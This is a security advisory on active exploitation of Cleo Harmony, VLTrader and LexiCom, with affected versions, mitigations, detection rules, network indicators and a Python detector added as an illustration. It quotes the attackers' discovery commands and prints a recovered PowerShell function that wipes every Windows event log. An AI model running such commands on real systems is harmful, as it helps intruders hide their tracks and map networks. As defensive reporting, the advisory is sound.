Last updated at Sun, 15 Dec 2024 19:55:08 GMT
On Monday, December 9, multiple security firms began privately circulating reports of in-the-wild exploitation targeting Cleo file transfer software. Late the evening of December 9, security firm Huntress published a blog on active exploitation of three different Cleo products (docs):
- Cleo VLTrader, a server-side solution for “mid-enterprise organizations”
- Cleo Harmony, which provides file transfer capabilities for “large enterprises”
- Cleo LexiCom, a desktop-based client for communication with major trading networks
Huntress’s blog noted that the exploitation they were seeing across Cleo products resulted from an insufficient patch for CVE-2024-50623, a vulnerability disclosed in Cleo VLTrader, Cleo Harmony, and Cleo LexiCom in October 2024. Cleo indicated that the vulnerability was fixed in version 5.8.0.21 of all three solutions, but according to Huntress, 5.8.0.21 remained vulnerable to exploitation. CVE-2024-50623 was initially listed as a cross-site scripting issue in NVD (CWE-79) but was modified to reflect CWE-434 (unrestricted file upload) as the root cause after this blog was published.
New critical vulnerability and exploitation (December 10)
On December 10, Cleo evidently communicated with customers acknowledging a new critical vulnerability in Cleo Harmony, VLTrader, and LexiCom "that could allow an unauthenticated user to import and execute arbitrary bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory." As of December 13, CVE-2024-55956 has been assigned to this issue.
As of December 10, Rapid7 MDR has confirmed successful exploitation of this issue (CVE-2024-55956) in customer environments; similar to Huntress, our team has observed enumeration and post-exploitation activity and is investigating multiple incidents. Rapid7 also has an analysis of a modular Java backdoor dropped as part of this campaign.
File transfer software continues to be a target for adversaries, and for financially motivated threat actors in particular. Rapid7 recommends taking emergency action to mitigate risk related to this threat.
Affected products
According to the vendor, the following products and versions are vulnerable to CVE-2024-50623. (Note: While the below reflects official vendor stance, it's contradicted by Huntress's analysis that 5.8.0.21 was not, in fact, fully patched for CVE-2024-50623.)
- Cleo Harmony prior to version 5.8.0.21
- Cleo VLTrader prior to version 5.8.0.21
- Cleo LexiCom prior to version 5.8.0.21
Cleo's advisory for the new issue (now CVE-2024-55956) was updated to indicate that a patch is available for all affected products — it's unclear exactly when the update occurred. The patch appears to have been released December 11.
The following versions are vulnerable to CVE-2024-55956:
- Cleo Harmony prior to version 5.8.0.24
- Cleo VLTrader prior to version 5.8.0.24
- Cleo LexiCom prior to version 5.8.0.24
Note: Release notes for the fix for CVE-2024-55956, which Rapid7 researchers pulled directly from the patched version of the software, appear to be dated December 9 despite the fact that no patch was known to be available at that time. Per the release notes, the patch "addresses a critical vulnerability which exploits the ability for unrestricted file upload and download and execute malicious host definitions in the product. After applying the patch, errors are logged for any files found at startup related to this exploit, and those files are removed."
Mitigation guidance
Cleo customers should update to the latest version of affected products immediately. Rapid7 still recommends removing affected products from the public internet and ensuring they are behind a firewall wherever possible. Disabling Cleo’s Autorun directory, which allows command files to be automatically processed, may also prevent the latter part of the attack chain from being executed.
Indicators of compromise and post-exploitation observations from Rapid7 MDR are available at the end of this blog; Huntress’s blog also has several descriptions of post-exploitation activity, including attack chain artifacts, commands run, and files dropped for persistence. Rapid7 recommends that affected customers review these indicators and investigate their environments for suspicious activity dating back to at least December 3, 2024.
Rapid7 customers
InsightVM and Nexpose customers can assess their exposure to both CVE-2024-50623 and CVE-2024-55956 on Windows with an authenticated vulnerability check available in the Tuesday, December 10 content release.
The following Query Builder queries can also help identify Cleo products in your environment:
software.vendor = 'Cleo Communications' AND software.product = 'Harmony'
software.vendor = 'Cleo Communications' AND software.product = 'VLTrader'
software.vendor = 'Cleo Communications' AND software.product = 'LexiCom'
software.vendor CONTAINS 'Cleo'
InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of rules deployed and alerting on behavior related to this threat:
- Suspicious Process - XORed Data in PowerShell
- Suspicious Process - PowerShell System.Net.Sockets.TcpClient
- Attacker Behavior - Possible Cleo MFT Exploitation 2024
- Attacker Tool - PowerShell -noni -ep -nop Flags
- Attacker Behavior - Obfuscated Powershell Script Containing -noni -ep -nop Flags
- Suspicious Process - Powershell Invoke-WebRequest
Rapid7 Labs has also released a Velociraptor artifact to help detect exploitation of Cleo software.
Rapid7-observed attacker behavior
Network IOCs:
89.248.172[.]139
176.123.10[.]115
185.162.128[.]133
185.163.204[.]137
185.181.230[.]103
45.182.189[.]102 - Cobalt Strike server
45.182.189[.]102/dpixel (payload location)
Post-exploitation behavior
In multiple attack chains, after initial exploitation, the adversary executed the following enumeration commands via cmd to gather user, group, and system information from the impacted system and display domain trust relationships.
systeminfo
net group /domain
whoami
wmic logicaldisk get name,size
nltest /domain_trusts
In addition, across multiple incidents, Rapid7 identified the usage of the Java-based RAT (e.g., cleo.1234) to spawn a PowerShell instance with the command line powershell.exe -NonInteractive -Command -. The PowerShell instance was then used to run a script that functions as a shellcode loader. After AES decryption and execution, the shellcode embedded within the script reaches out to the Cobalt Strike server 45.182.189[.]102 over HTTP. The shellcode within the PowerShell script acts as a stager, and ultimately downloads, decrypts, loads, and executes a 64-bit Cobalt Strike beacon DLL from the server. From one decrypted Cobalt Strike beacon, acquired from 45.182.189[.]102, Rapid7 extracted the license ID 1580103824.
During analysis of the PowerShell script, Rapid7 recovered a function that is capable of clearing the Windows event logs if the executing process is a member of the Administrators group. Despite the script executing under the SYSTEM user however, Rapid7 did not observe usage of the function, which allowed for the recovery and analysis of the script.
$mkpfaejh85 = [bool](([Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544");if ($mkpfaejh85) { start-Process 'powershell' '-c "&{Get-EventLog -LogName *|ForEach{Clear-EventLog $_.Log}}"' -nonewwindow; };
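As an added illustration (not code from the Rapid7 post), the following Python detector runs over constructed process-creation events and flags the three behaviors described above: a Cleo Java process spawning PowerShell that reads its script from stdin (-NonInteractive -Command -), a burst of the listed discovery commands under one Java parent, and bulk event-log clearing. The parent image name java.exe, the event field names, and the sample events are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (not real telemetry).
# pid/ppid link children to parents; cmd is the full command line.
EVENTS = [
    {"pid": 10, "ppid": 1, "image": "java.exe", "cmd": "java.exe -jar cleo.1234"},
    {"pid": 11, "ppid": 10, "image": "powershell.exe",
     "cmd": "powershell.exe -NonInteractive -Command -"},
    {"pid": 12, "ppid": 10, "image": "cmd.exe", "cmd": "cmd.exe /c systeminfo"},
    {"pid": 13, "ppid": 10, "image": "cmd.exe", "cmd": "cmd.exe /c net group /domain"},
    {"pid": 14, "ppid": 10, "image": "cmd.exe", "cmd": "cmd.exe /c whoami"},
    {"pid": 15, "ppid": 10, "image": "cmd.exe", "cmd": "cmd.exe /c nltest /domain_trusts"},
    {"pid": 16, "ppid": 11, "image": "powershell.exe",
     "cmd": 'powershell -c "&{Get-EventLog -LogName *|ForEach{Clear-EventLog $_.Log}}"'},
    {"pid": 20, "ppid": 2, "image": "cmd.exe", "cmd": "cmd.exe /c whoami"},  # benign: no Java parent
]

# Discovery commands observed in the Rapid7-described attack chains.
DISCOVERY = ("systeminfo", "net group /domain", "whoami",
             "wmic logicaldisk", "nltest /domain_trusts")
# PowerShell started with -NonInteractive -Command - (script delivered over stdin).
STDIN_PS = re.compile(r"-noni\w*\s+-c\w*\s+-\s*$")


def detect(events, burst_threshold=3):
    """Return a list of (rule_name, pid) findings for the behaviors described in the post."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    discovery_per_parent = defaultdict(set)
    for e in events:
        parent = by_pid.get(e["ppid"])
        parent_is_java = parent is not None and parent["image"].lower() == "java.exe"
        cmd = e["cmd"].lower()
        # 1. Java (Cleo) process spawning PowerShell that reads its script from stdin.
        if parent_is_java and e["image"].lower() == "powershell.exe" and STDIN_PS.search(cmd):
            findings.append(("java_spawns_stdin_powershell", e["pid"]))
        # 2. Collect distinct discovery commands per Java parent for the burst rule below.
        if parent_is_java:
            for d in DISCOVERY:
                if d in cmd:
                    discovery_per_parent[e["ppid"]].add(d)
        # 3. Bulk Windows event-log clearing, as in the recovered function above.
        if "clear-eventlog" in cmd:
            findings.append(("event_log_clearing", e["pid"]))
    for ppid, seen in discovery_per_parent.items():
        if len(seen) >= burst_threshold:
            findings.append(("discovery_burst_under_java", ppid))
    return findings
```

Running detect(EVENTS) flags PIDs 11 and 16 and the Java parent 10, while the whoami with no Java ancestor (PID 20) is not reported.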
Rapid7 also observed post-exploitation activity in the form of an "OverPass-The-Hash" attack, in which the adversary leverages the NTLM hash of an account to obtain a Kerberos ticket that can be used to access additional network resources within the impacted environment.
MITRE ATT&CK Enterprise Techniques
Tactic | Technique
Initial access | Exploit Public-Facing Application (T1190)
Execution | Command and Scripting Interpreter (T1059)
Discovery | System Owner/User Discovery (T1033)
Discovery | System Information Discovery (T1082)
Discovery | Domain Trust Discovery (T1482)
Discovery | Permission Groups Discovery (T1069)
Lateral movement | Use Alternate Authentication Material: Pass the Hash (T1550/002)
Updates
Dec. 10, 2024: Updated wording to clarify that there are now two vendor advisories — the original advisory for CVE-2024-50623, which still indicates that versions prior to 5.8.0.21 are vulnerable; and the new advisory with "CVE pending," which specifies versions of affected software prior to and including 5.8.0.21 are vulnerable to a new issue (presumably the patch bypass).
Dec. 11, 2024: Updated to reflect InsightVM check availability and to note that the CWE assigned to CVE-2024-50623 has been changed to CWE-434 in NVD. Updated with Rapid7-observed attacker behavior and indicators.
Dec. 12, 2024: Updated to reflect patch availability for the CVE-pending critical vulnerability in Cleo Harmony, LexiCom, and VLTrader. Also updated to clarify the difference between advisories for the two discrete vulnerabilities (CVE-2024-50623 and CVE-2024-55956). Added link to Rapid7's analysis of a Java backdoor dropped during exploitation.
Dec. 13, 2024: Updated with CVE ID (CVE-2024-55956) throughout.
Dec. 15, 2024: Updated with additional IOCs and Rapid7-observed attacker behavior.